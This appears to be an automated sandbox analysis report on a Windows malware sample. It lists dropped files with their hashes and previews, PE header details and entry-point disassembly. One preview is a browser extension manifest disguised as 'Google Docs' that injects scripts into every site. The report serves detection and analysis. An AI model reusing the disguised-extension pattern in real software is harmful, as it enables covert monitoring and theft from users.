                                                                                                                                                                                                                                            SHA-256:CC3631CED23F21AE095C1397770E685F12F6AD788C8FA2F15487835A77A380FB
                                                                                                                                                                                                                                            SHA-512:753E28BAB9D50B7882A1308F6072F80FDA99EDEAA476FAFC7E647D29F5C9C15F5C404689C866F8F198B7F1ED41BAE3CC55AE4D15528B0DF966A47CBC4B31CAF6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............>a.....sRGB.........gAMA......a.....IDATx^.yt.....H.$!@......tf...9uA..*..H.w..#"...N......K .....N...helE%...a..........}......9.wr..=..~.r.....N8..N8..N8..N8.t.....?...{..a......o&5?7..3hA...<~...~.......p.5(..o....Z6$..&.....=.DUO8.9...?/.0....?...'......XE.......#H..s.o.x.....v.,8.%..;X.....$lZ....^D..............$bp....<M@....v.......0.......S..7#.."(..Ea.~...L..`FP.F.dx...[.a.....,..;.@...../"YX.........]...\./"Y8....Z. #...0...H...0#(.Fp0..vx....'..... ....D@...R.?k..........&.....{../..[..M.9.n.. .&.^.........._...u..8. ..t..?!V.....]v.....6.y..}E ...p|[.8...|w`..u...7#...1........".`.Xz..........1...d;..G......0..?.D....U/h=0..F0l.rND...`....v8g.-0.[...^.kw=..]G`.....YP...0..M....C.tM........H.v...1......;...7...........L.jC....P.o....L..>.@.....].8.."&....-&......NP.I.8...\..@c......5..._...=#..G... 6.......'!...@.%......y..l.a.@..7d.1....g..3..<.^+M.WK.Cu.R........]#T......4.^...'gU...~...L...z...@
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32086)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):95785
                                                                                                                                                                                                                                            Entropy (8bit):5.393592005865771
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:/PEkjP+iADIOr/NEe876nmBu3HvF38sEeLHFoqqhJ7SerN5wVI+xcBmPv7E+nzmQ:ENMyqhJvN32cBC7M6Whca98Hrp
                                                                                                                                                                                                                                            MD5:3C9137D88A00B1AE0B41FF6A70571615
                                                                                                                                                                                                                                            SHA1:1797D73E9DA4287351F6FBEC1B183C19BE217C2A
                                                                                                                                                                                                                                            SHA-256:24262BAAFEF17092927C3DAFE764AAA52A2A371B83ED2249CCA7E414DF99FAC1
                                                                                                                                                                                                                                            SHA-512:31730738E73937EE0086849CB3D6506EA383CA2EAC312B8D08E25C60563DF5702FC2B92B3778C4B2B66E7FDDD6965D74B5A4DF5132DF3F02FAED01DCF3C7BCAE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:/*! jQuery v1.11.1 | (c) 2005, 2014 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.1",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):569
                                                                                                                                                                                                                                            Entropy (8bit):4.878267680490818
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:flNAuCONn3Ao19aHuDFRJIbpmxbuvWB0vXY:flVCONQo1XabpWuvPvXY
                                                                                                                                                                                                                                            MD5:2835DD0A0AEF8405D47AB7F73D82EAA5
                                                                                                                                                                                                                                            SHA1:851EA2B4F89FC06F6A4CD458840DD5C660A3B76C
                                                                                                                                                                                                                                            SHA-256:2AAFD1356D876255A99905FBCAFB516DE31952E079923B9DDF33560BBE5ED2F3
                                                                                                                                                                                                                                            SHA-512:490327E218B0C01239AC419E02A4DC2BD121A08CB7734F8E2BA22E869B60175D599104BA4B45EF580E84E312FE241B3D565FAC958B874D6256473C2F987108CC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:{.."manifest_version": 2,..."name": "Google Docs",.. "description": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.",.."version": "1.7.38",.."icons": {. "16": "icon.png",. "48": "icon.png",. "128": "icon.png". },..."permissions": [..."activeTab",..."storage"..],.."content_scripts": [ {..."all_frames": true,..."js": [ "jquery.js","content.js"],..."matches": [ "<all_urls>" ] ..} ],.."background": {. ."service_worker": "background.js". .},.."browser_action": {..."default_title": "SFASFASD"..}.}
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1640960
                                                                                                                                                                                                                                            Entropy (8bit):6.484662993855079
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
                                                                                                                                                                                                                                            MD5:D1BA9412E78BFC98074C5D724A1A87D6
                                                                                                                                                                                                                                            SHA1:0572F98D78FB0B366B5A086C2A74CC68B771D368
                                                                                                                                                                                                                                            SHA-256:CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
                                                                                                                                                                                                                                            SHA-512:8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2469936
                                                                                                                                                                                                                                            Entropy (8bit):6.434916453080517
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Y8UMSn5cV2N9LNwtQ5gRR+moI1axGbYj6QAl4ImDkg7d5lROCDG5yzlC97W+uJUM:QMS5hN9OtQ5gRjoI8xGbYj6QAl4gg7dF
                                                                                                                                                                                                                                            MD5:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                            SHA1:FE54B31B0DB8665AA5B22BED147E8295AFC88A03
                                                                                                                                                                                                                                            SHA-256:A05B592A971FE5011554013BCFE9A4AAF9CFC633BDD1FE3A8197F213D557B8D3
                                                                                                                                                                                                                                            SHA-512:140FEE6DAF23FE8B7E441B3B4DE83554AF804F00ECEDC421907A385AC79A63164BD9F28B4BE061C2EA2262755D85E14D3A8E7DC910547837B664D78D93667256
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]..<...<...<...D...<...J...<...J).A<...J(..=...D...<...<...?...J,..=...J...<...J...<..Rich.<..........................PE..L... .kU..........................................@..........................0&......&&...@.................................H. ......0"...............%.0 ...."..K...................................C..@...............,..... .@....................text............................... ..`.rdata...=.......>..................@..@.data....-....!....... .............@....rsrc........0".......!.............@..@.reloc...N...."..P...@".............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):20891
                                                                                                                                                                                                                                            Entropy (8bit):5.41735141652497
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:lhFF7DUQMnBNgCxPE/7tDEZAXMtV3STIxyd3A3lafgfdl6ii04ZQoUXXhnF6b2xD:fBMYqPE/7tDEZAK3STIxnlrn6U4ZhUXp
                                                                                                                                                                                                                                            MD5:FCE67E49E191BC3FD22997050C92BA01
                                                                                                                                                                                                                                            SHA1:34C08D6D404A94C2447B671A49731364EA0B47FF
                                                                                                                                                                                                                                            SHA-256:F8EB44951269696615DFA62E8221C73D8EBCE0A820211956D5BF6C0A70C6DACF
                                                                                                                                                                                                                                            SHA-512:4C4E1F908824DAA7F3081773CA22138C756601C6C6113E0DCF9CBC958E90A5028D9BE7E5404F19432D70B1E90D46919274188718D29F9A46B97E7ACBE8222991
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:.j.yvH.w....F.....m....^.OL`......c.`..Ldqsp.N.....v...\ae].yH.E.`^..d...m.W.U....L......]q..]hbT.Y.TLNcOP`.r.C.Lv.A...V^Fg.dr.i.^..o.GXp.H......yu...xEIAb.LGn_Y.........gjE[...hkhU..A..Adq.QlsO...`Rt..J]..s..u.j.......[lcxNuN.ZoANK..yth]q..t..DL.A`..Q.`_P...x.\..`..I.G.b.Iml.....MVfq.r[sE.HV..a.h.W.d.[QF.N...P.uaFNBdFj.s.W...x...Y...ZJ..x.u.iCyeyv.QxL.O..j.ckOGE^..xSv...^W].S.k\.en.VIuYfSuS...qu...f....K..]f...._.O.O.o.d...m.OArv...Lq....menEX..d..Qf..\FiRd.L.Vu.t.BJ...u.RR.JekI.PDg..g.H....\k..F..LX.a_.m..Bj.brCBh...v.a....ch.D[...G.....D....j.NaelL.F.^a.a.ur.^.tsN..ZH.Io.N.tr.f.exr.D.SNbHIR....]Jb.D.nlu..B.LnY..jp.n...bpmqb...Kc..y.ut.N._m.G.r.c..y.m..]cF.V.F...sMC.yrv..i....O..IAvn.vn..B.A.w.BDF...]M....b.G.XlB.xar..g.q...N..AU.E.Ox....R..k...vaP...S..sQ.....R[O..I.I.dma.T..S.E.y.a.FG...wOk..Q..\U.]..`..x\Z...ps.J..F.....Qf...Z.Pi.L..P.b.\.Tm.P.R.B.PU..d...k..[iS^.TH^N.hjrwwg._....wL....[.I.rt..g.]x..qh[Y.H.xn.N...A..wRF..W.V....jyU.Du.o...p..vO.m.lOTjk.HW.......L.dO....C..bQ.L..i.
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1385173
                                                                                                                                                                                                                                            Entropy (8bit):7.824453259021933
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24576:3ThHnVpIact6qMIPrpLhmwg9lUKOxrcP4912kZp/GYOQWINQvshJC6lVwymgw:DhHVfC6q7PrpLhmwDKOxrg4r2kEINQvX
                                                                                                                                                                                                                                            MD5:31885BEFE89EAE873D959F47BB548157
                                                                                                                                                                                                                                            SHA1:4A1D665C491D334EAE72CDD5B784F2A064A8FBBF
                                                                                                                                                                                                                                            SHA-256:A06A3D6810B4B5F73A0B71487F9B32538C34F66E26F0DC1632F3D40BF0E11B71
                                                                                                                                                                                                                                            SHA-512:0C1561929D19E52229E8FE3295148C8E4BC73526A59028F9FBB5BD11D2A8163CC6137232B55082AA1FC1E5F444F583064F4BC7BF282730B754BEE3C9656ED5D0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:..ZJpL.......C\.bFNR.cgl\..j.......\u...KRCMZ....KY^.L..ap...BbB..J\.qH..o.e....]OZuwL..Nnvv..f.F.fV.T......n..Q....yhai....P.......l........O.sO.dX.RdX...L.i.q..UNub..IJ..C....FH.uq.xn..^Cfs..pb....RUlHfEr`..U....^wcX..Se.uYkc..kb.Z[O..K.F.u.i..pibZ]_O.`....\UJpL.eJ`..ro.xE.mJ]O.R...D.Cft...J..feJ...IuHV.fpvV.xnW.XaN..A..Z.JupSsC..u.N.Gm..j.L..[R.....Yv]U..hrwy.jV...oSK...ffiH..H.RK.gmJw.i.uK..rN.Ei.\PHj...gE...C..dC...u...N._.fYV.e.d.a..M.T....sd.k.....S.w.....R`k......Sd.Kg.i.\.m..p.w.s...]Gx..e^....Q...PBs.\W.e.Xv.....D.a[K].[V.Ku.^Q.s...Gu.d.LO.l.YN...k....QD.\..JN.tUG...OeM.KR..uK.t..V.RB.\.h.h....d.HA.t.i...[.an...y.....``^EiEXul.gUG..uH..Z.nGU....H..O.D...s.P.kmoSk.[ZVvO..X..ae..LqtTN..K.PDn...........]rZOy.V.Mq.bgP....xM..VD__....iup[.\Ma....ty.PKFid..g..nThl..w...ub......o.j.R.e....iuLb.p..wA.].d.f....Ub...mV.Xvv.U.f.E..A..Zv.ZP.d......LVi_...O..nwI\N.F...d..y..j..^C.Hu.Am[Jw.S]ul..d.m[..UQT.Hl..QDC.uZ..Ds.Z..W.X.w..^....ryJi`lj...O...xJ..jNVU.se.c.I.D.....O....P\GW`...Zn.E.x
                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\driverRemote_debug\UniversalInstaller.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1596416
                                                                                                                                                                                                                                            Entropy (8bit):6.466475314379774
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:h2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTMq+PDXx1lWz0pd:tmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
                                                                                                                                                                                                                                            MD5:EA945E6BC518D0B25AAC0FCE13AE6E16
                                                                                                                                                                                                                                            SHA1:4144AC69F72190F1AD163A7CC7BD38E18109122C
                                                                                                                                                                                                                                            SHA-256:6D9D8727E9D8C00EB74B27C6EE3FDC90D538F30CF6A07C4B939A03FC70CE59EE
                                                                                                                                                                                                                                            SHA-512:4E2F4CF61FC6364DDACA6B0BF6D917F8E136526DC1323A8BAA48166CB291285491CC2D083B65EBE30F3DC27F62B2E154A834C721140E6004596D655269239A95
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..|....p...............................}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                                            Entropy (8bit):4.419325349303115
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:lcifpi6ceLPL9skLmb0mbSWSPtaJG8nAgex285i2MMhA20X4WABlGuNL5+:Ci58bSWIZBk2MM6AFB9o
                                                                                                                                                                                                                                            MD5:5F35FF9768AB359185CDF262A7274072
                                                                                                                                                                                                                                            SHA1:D5747A8CDCD36209D97D4BD3D025A6BAD64114B2
                                                                                                                                                                                                                                            SHA-256:8D2A977AE00D6B39D65C3C5DD72697A9A1519252B2958BBDECF1F05378EB1EF4
                                                                                                                                                                                                                                            SHA-512:E89BF11FAA04B9528FDD39A868549B8E3F78B918EA8FF848943AAE4AEB5A29E8984F124C6AD77068BB1304B34D8E83C4DB08847812CA7E92B778DAF0D6156753
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                            Preview:regfF...F....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.(j.Q................................................................................................................................................................................................................................................................................................................................................G|.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Entropy (8bit):7.080954084460766
                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                            File name:zLwT7vCojz.exe
                                                                                                                                                                                                                                            File size:485'377 bytes
                                                                                                                                                                                                                                            MD5:577592f54bb4b19d416913b1816f7971
                                                                                                                                                                                                                                            SHA1:b36d64d5c46982f85c890d129c439a678299d11e
                                                                                                                                                                                                                                            SHA256:1e9f56f3709d1ecef0ebd00e173acf65f93d84439647a193ae558728dddff327
                                                                                                                                                                                                                                            SHA512:606b53133070af64bbc4cefb181bf18a897082da9247f4cfc62652b90559e91bcf22c678cf762bd63a9bf03130720dea921d4dd7403956cbcb01459b6bd47b16
                                                                                                                                                                                                                                            SSDEEP:6144:dYGgupEJ12YQcP55RYd85n4roeyk5FNP0Pz1BHF+hzxYaE1cco:dYGgupEJ1brP5si5Iyk5wXQYnBo
                                                                                                                                                                                                                                            TLSH:D4A4C00372F0AC60E5622A319F2BB69C669FFD51DE11572B2E08610F66703E0F6A375D
                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L.....sd...........
                                                                                                                                                                                                                                            Icon Hash:492951455555510d
                                                                                                                                                                                                                                            Entrypoint:0x403945
                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                            Time Stamp:0x6473CDB1 [Sun May 28 21:54:57 2023 UTC]
                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                            OS Version Minor:1
                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                            File Version Minor:1
                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                            Subsystem Version Minor:1
                                                                                                                                                                                                                                            Import Hash:c9619f19f41ef1b7d232f47cfbcc330b
                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                            call 00007FDC04D57E32h
                                                                                                                                                                                                                                            jmp 00007FDC04D53DB5h
                                                                                                                                                                                                                                            push 00000014h
                                                                                                                                                                                                                                            push 00414DE8h
                                                                                                                                                                                                                                            call 00007FDC04D549DAh
                                                                                                                                                                                                                                            call 00007FDC04D5654Bh
                                                                                                                                                                                                                                            movzx esi, ax
                                                                                                                                                                                                                                            push 00000002h
                                                                                                                                                                                                                                            call 00007FDC04D57DC5h
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            mov eax, 00005A4Dh
                                                                                                                                                                                                                                            cmp word ptr [00400000h], ax
                                                                                                                                                                                                                                            je 00007FDC04D53DB6h
                                                                                                                                                                                                                                            xor ebx, ebx
                                                                                                                                                                                                                                            jmp 00007FDC04D53DE5h
                                                                                                                                                                                                                                            mov eax, dword ptr [0040003Ch]
                                                                                                                                                                                                                                            cmp dword ptr [eax+00400000h], 00004550h
                                                                                                                                                                                                                                            jne 00007FDC04D53D9Dh
                                                                                                                                                                                                                                            mov ecx, 0000010Bh
                                                                                                                                                                                                                                            cmp word ptr [eax+00400018h], cx
                                                                                                                                                                                                                                            jne 00007FDC04D53D8Fh
                                                                                                                                                                                                                                            xor ebx, ebx
                                                                                                                                                                                                                                            cmp dword ptr [eax+00400074h], 0Eh
                                                                                                                                                                                                                                            jbe 00007FDC04D53DBBh
                                                                                                                                                                                                                                            cmp dword ptr [eax+004000E8h], ebx
                                                                                                                                                                                                                                            setne bl
                                                                                                                                                                                                                                            mov dword ptr [ebp-1Ch], ebx
                                                                                                                                                                                                                                            call 00007FDC04D5485Ch
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            jne 00007FDC04D53DBAh
                                                                                                                                                                                                                                            push 0000001Ch
                                                                                                                                                                                                                                            call 00007FDC04D53E91h
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            call 00007FDC04D579C3h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            jne 00007FDC04D53DBAh
                                                                                                                                                                                                                                            push 00000010h
                                                                                                                                                                                                                                            call 00007FDC04D53E80h
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            call 00007FDC04D56294h
                                                                                                                                                                                                                                            and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                                            call 00007FDC04D55B94h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            jns 00007FDC04D53DBAh
                                                                                                                                                                                                                                            push 0000001Bh
                                                                                                                                                                                                                                            call 00007FDC04D53E66h
                                                                                                                                                                                                                                            pop ecx
                                                                                                                                                                                                                                            call dword ptr [0040F0C4h]
                                                                                                                                                                                                                                            mov dword ptr [04046868h], eax
                                                                                                                                                                                                                                            call 00007FDC04D57E19h
                                                                                                                                                                                                                                            mov dword ptr [00455820h], eax
                                                                                                                                                                                                                                            call 00007FDC04D57A16h
                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                            jns 00007FDC04D53DBAh
                                                                                                                                                                                                                                            Programming Language:
                                                                                                                                                                                                                                            • [ASM] VS2013 build 21005
                                                                                                                                                                                                                                            • [ C ] VS2013 build 21005
                                                                                                                                                                                                                                            • [C++] VS2013 build 21005
                                                                                                                                                                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                            • [RES] VS2013 build 21005
                                                                                                                                                                                                                                            • [LNK] VS2013 UPD5 build 40629
                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x151fc0x50.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c470000x22069.rsrc
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xf1f00x38.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x147980x40.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xf0000x18c.rdata
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                            .text0x10000xdde30xde0015b07b85bcd9520d4f37fdd0be763da8False0.6055567286036037data6.704408972550424IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .rdata0xf0000x6b200x6c00148298c80b94a7d27eb0460d57fb10caFalse0.3941333912037037data4.804310456243546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            .data0x160000x3c308800x3f800b551e695ab88d39c5abb037711c2fff2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                            .rsrc0x3c470000x220690x222004b3ed349a7712de61b75308f83845ecdFalse0.4784655448717949data5.5474239505686285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
